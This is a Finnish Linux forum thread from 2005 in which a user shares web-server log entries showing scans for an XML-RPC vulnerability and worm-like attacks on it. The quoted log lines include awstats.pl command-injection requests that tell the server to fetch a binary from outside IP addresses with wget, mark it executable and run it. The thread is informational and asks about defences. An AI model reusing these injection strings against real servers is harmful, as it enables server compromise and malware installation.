Linux mato liikkeellä?

Viestiketju Linux -keskustelu -osiossa. Ketjun avasi .W. 10.11.2005.

  1. .W.

    .W. Regular member

    Liittynyt:
    01.03.2004
    Viestejä:
    838
    Kiitokset:
    0
    Pisteet:
    26
    Eilen uutisoitiin kesäkuussa löydetystä tietoturva aukosta xml-rpc rajapinnassa. Heti näkyy logissa hyökkäyksiä tuota aukkoa vasten: Logista:

    /xmlrpc.php
    /xmlrpc/xmlrpc.php
    /phpgroupware/xmlrpc.php
    /blog/xmlrpc.php
    /xmlsrv/xmlrpc.php
    /blogs/xmlsrv/xmlrpc.php
    /blog/xmlsrv/xmlrpc.php
    /wordpress/xmlrpc.php
    /drupal/xmlrpc.php

    Sekä siihen liittyvät:

    /scgi-bin/awstats/awstats.pl?configdir=|echo;echo YYY;cd /tmp;wget 62.101.193.244/lupii;chmod +x lup...
    /cgi-bin/awstats/awstats.pl?configdir=|echo;echo YYY;cd /tmp;wget 62.101.193.244/lupii;chmod +x lupi...


    Ja vielä uudemmat viimeyöltä jossa [bold]lupii[/bold] niminen tiedosto on muuttunut [bold]listen[/bold] nimiseksi.

    /cgi-bin/awstats/awstats.pl?configdir=|echo;echo YYY;cd /tmp;wget 24.224.174.18/listen;chmod +x list...
    /awstats/awstats.pl?configdir=|echo;echo YYY;cd /tmp;wget 24.224.174.18/listen;chmod +x listen;./lis...
    /cgi-bin/awstats.pl?configdir=|echo;echo YYY;cd /tmp;wget 24.224.174.18/listen;chmod +x listen;./lis...
     
  2.  
  3. Faeryan

    Faeryan Regular member

    Liittynyt:
    03.10.2005
    Viestejä:
    282
    Kiitokset:
    0
    Pisteet:
    26
    Ei aiheeseen löytynyt mitään linkkejä? Missäs siellä lokitiedostoissa nuo mahdollisesti löytyvät ja onkos tuohon keksitty joku vastakeino? Tietty portti umpeen tjsp?
     
  4. .W.

    .W. Regular member

    Liittynyt:
    01.03.2004
    Viestejä:
    838
    Kiitokset:
    0
    Pisteet:
    26

Jaa tämä sivu